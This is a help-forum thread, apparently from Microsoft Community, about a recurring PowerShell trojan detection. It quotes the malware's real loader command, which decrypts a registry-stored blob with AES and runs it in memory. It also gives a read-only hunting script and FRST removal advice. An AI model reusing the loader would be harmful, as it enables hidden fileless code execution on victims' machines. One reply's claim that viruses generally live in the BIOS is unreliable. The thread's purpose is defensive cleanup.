It's an infostealer so, passwords, logins, whatever a keylogger could acquire, etc. Hopefully Malwarebytes got all of it.
How do I really get rid of Trojan:Win32/PowerBypass.DA!MTB? It keeps coming back.
For the past eight days at least, at the start of each day, Windows Defender has supposedly removed Trojan:Win32/PowerBypass.DA!MTB from my system. But it keeps doing this, implying that this trojan isn't really gone. How do I get rid of this for good?
Locked question, migrated from the Microsoft Support Community.
Anonymous, 2025-04-21T12:03:29+00:00
Microsoft Community seems to not be happy with sharing images, so here's the text of the detection record:
Detected: Trojan:Win32/PowerBypass.DA!MTB
Status: Removed
A threat or app was removed from this device.
Details: This program is dangerous and executes commands from an attacker.
Affected Items:
CmdLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command $A=New-Object System.Security.Cryptography.AesCryptoServiceProvider;$A.Key=@([byte]0,196,140,72,21,72,64,89,154,182,168,161,70,202,2,191,102,42,211,52,91,254,29,124,110,58,126,180,105,191,32,157);$A.IV=@([byte]221,102,202,39,207,201,16,220,13,229,251,157,63,5,0,156);$F=(get-itemproperty 'HKCU:\Software\Classes\tlrdnl1kcfk').'(default)';[Reflection.Assembly]::Load($A.CreateDecryptor().TransformFinalBlock($F,0,$F.Length));[YQirTLzRAk9kIDH0AJifVmigFQv6zlpQ0jjCUuZX3E_r7r3wVU0WaoRgJBihbM_QVx.eWKDxqqzm0nAi4tb96jtpVPxGyiTX2PtAAktSAUuWDuFLYixKB5]::g6T4pyZII3rtNNXoN1GeIWPOljI4CT3('7Y0RETCT70KK5C6VWK21K3YG9FN3T8BI');
The FRST logs contain a lot of personal information about my computer, so I'm not sure I'm comfortable uploading that online. Is there anything in the log I should be looking for as a sign of where the trojan is and/or how to fix it?
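The detection record above shows what Defender keeps catching: a powershell.exe command that reads an encrypted blob from a registry key under HKCU:\Software\Classes, decrypts it with AES and loads the result as a .NET assembly straight into memory. Defender stops that process each day, but the two things that make it come back are whatever starts the command (typically a Run key, a scheduled task or a WMI event consumer) and the registry key holding the blob. The script below is an added example, not code from this thread or from Microsoft; it is read-only and lists candidate locations for both artifacts. The search pattern, the 4096-byte size threshold and the set of autostart locations checked are my assumptions.

```powershell
# Added example (not from this thread): read-only hunt for the artifacts implied by
# the detection record. It reports (1) autostart entries that launch powershell.exe
# with an in-memory Assembly.Load, and (2) keys under HKCU:\Software\Classes whose
# (default) value is a large REG_BINARY blob, which is where the encrypted payload
# was stored. Run from an elevated PowerShell prompt (Get-ScheduledTask and the
# root\subscription namespace need admin rights for a full view). Nothing is modified.

# Assumption: these strings are characteristic of the loader seen in the record.
$loaderPattern = 'Reflection\.Assembly|TransformFinalBlock|AesCryptoServiceProvider'
# Assumption: a .NET assembly is far larger than a normal Classes value.
$minBlobSize   = 4096
# Properties Get-ItemProperty adds that are not registry values.
$skipProps     = 'PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider'

$findings = New-Object System.Collections.Generic.List[object]

# 1) Run / RunOnce keys for the current user and for the machine
$runKeys = @(
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
)
foreach ($key in $runKeys) {
    if (-not (Test-Path $key)) { continue }
    $props = Get-ItemProperty -Path $key
    foreach ($p in $props.PSObject.Properties) {
        if ($p.Name -in $skipProps) { continue }
        if ("$($p.Value)" -match $loaderPattern) {
            $findings.Add([pscustomobject]@{
                Type = 'RunKey'; Location = "$key\$($p.Name)"; Detail = "$($p.Value)"
            })
        }
    }
}

# 2) Scheduled tasks whose action runs powershell.exe with the loader pattern
foreach ($task in (Get-ScheduledTask -ErrorAction SilentlyContinue)) {
    foreach ($action in $task.Actions) {
        $cmd = "$($action.Execute) $($action.Arguments)"
        if ($cmd -match 'powershell' -and $cmd -match $loaderPattern) {
            $findings.Add([pscustomobject]@{
                Type = 'ScheduledTask'; Location = "$($task.TaskPath)$($task.TaskName)"; Detail = $cmd
            })
        }
    }
}

# 3) Permanent WMI event consumers, another common fileless autostart
$consumers = Get-CimInstance -Namespace 'root\subscription' -ClassName CommandLineEventConsumer -ErrorAction SilentlyContinue
foreach ($c in $consumers) {
    if ("$($c.CommandLineTemplate)" -match $loaderPattern) {
        $findings.Add([pscustomobject]@{
            Type = 'WmiConsumer'; Location = $c.Name; Detail = $c.CommandLineTemplate
        })
    }
}

# 4) The payload store: Classes subkeys whose (default) value is a big binary blob
foreach ($k in (Get-ChildItem -Path 'HKCU:\Software\Classes' -ErrorAction SilentlyContinue)) {
    $default = $k.GetValue('')          # '' selects the (default) value
    if ($default -is [byte[]] -and $default.Length -ge $minBlobSize) {
        $findings.Add([pscustomobject]@{
            Type = 'RegistryBlob'; Location = $k.Name; Detail = "$($default.Length)-byte REG_BINARY default value"
        })
    }
}

if ($findings.Count -eq 0) {
    Write-Host 'No loader autostarts or large Classes blobs found in the locations checked.'
} else {
    $findings | Format-Table -AutoSize -Wrap
}
```

If the key named in the record (tlrdnl1kcfk) is still present it will show up under RegistryBlob; the RunKey, ScheduledTask or WmiConsumer line is the thing relaunching the command each morning. Removing the autostart entry and then deleting the blob key (export it first if you want to keep a copy for analysis) is what stops the daily re-detection; the FRST logs requested later in this thread list the same autostart locations, so the two approaches should agree.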
quietman7, MVP Alumni, 19,735 Reputation points, Volunteer Moderator, 2025-04-20T00:35:59+00:00
I could not even find a listing of Trojan:Win32/PowerBypass.DA!MTB on Microsoft's change logs for security intelligence threat detections.
I suggest you follow AW's instructions for using FRST.
_AW_, 67,756 Reputation points, Volunteer Moderator, 2025-04-20T00:11:45+00:00
Please post a screenshot of the detection record and where it is being detected.
Also scan with Farbar Recovery Scan Tool (FRST) so that startup locations and services can be checked for malware.
https://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/
Note: If you are using Edge or Chrome, SmartScreen may initially block the download.
Click on the three dots next to the warning and select Keep => Show more => Keep anyway.
- If your computer's language is not English, rename FRST64.exe to FRST64English.exe
- Run the tool, leave the default settings, and press Scan.
- Zip the logs, FRST.txt and Addition.txt, then upload to a cloud storage service like OneDrive, Google Drive or gofile.io
- Post the share link.
Anonymous, 2025-04-19T21:23:15+00:00
Since viruses are not hosted in a single part of the system but in general in the BIOS, it is best to do a new installation of your operating system from a USB so that the virus is completely eliminated. I recommend an antivirus, and not downloading anything from unreliable pages, to avoid losing your data.
Remember that most viruses are inserted into files, and even if we do the Windows installation without losing your files, sometimes the virus persists.
I recommend a clean and complete installation of your OS so that nothing remains of the virus.